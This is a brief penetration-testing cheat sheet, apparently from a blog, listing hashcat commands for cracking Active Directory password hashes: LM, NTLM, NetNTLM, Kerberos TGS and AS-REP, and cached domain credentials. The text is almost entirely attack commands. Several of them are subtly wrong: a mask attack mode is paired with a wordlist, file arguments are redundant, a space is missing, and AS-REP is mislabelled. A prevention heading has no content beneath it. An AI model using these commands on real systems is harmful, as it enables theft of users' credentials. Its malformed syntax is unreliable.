Learn how to crack Active Directory Passwords using Hashcat

Crack LM Hashs

LM hash is used by Microsoft LAN manager used on old versions, which is totally insecure.

We can crack LM with hashcat using: 

hashcat -m 3000 -a 3 hash.txt

How to prevent Windows from storing a LAN manager hash of your password in Active Directory and local SAM databases

Cracking Windows New Technology LAN Manager (NTLM)

hashcat -m 1000 -a 3 hash.txt

NetNTLMv1 

hashcat -m 5500 -a 3 hash.txt

NetNTLMv2 

hashcat -m 5600 -a 3 hash.txt rockyou.txt

Kerberos 5 TGS 

hashcat -m 13100 -a 3 hash.txt rockyou.txt

Kerberos 5 TGS AES128 

hashcat -m 19600 -a 0 spn.txt hash.txt rockyou.txt

Kerberos 5 TGS AES256 

hashcat -m 19700 -a 0 spn.txt hash.txt rockyou.txt

Kerberos ADREP 

hashcat -m 18200 -a 0 spn.txt hash.txt rockyou.txt

MsCache 2 

hashcat -m 2100-a 0 mscache-hash.txt hash.txt rockyou.txt

Avatar of RFS

RFS (104)

Penetration Testing, Windows Penetration Testing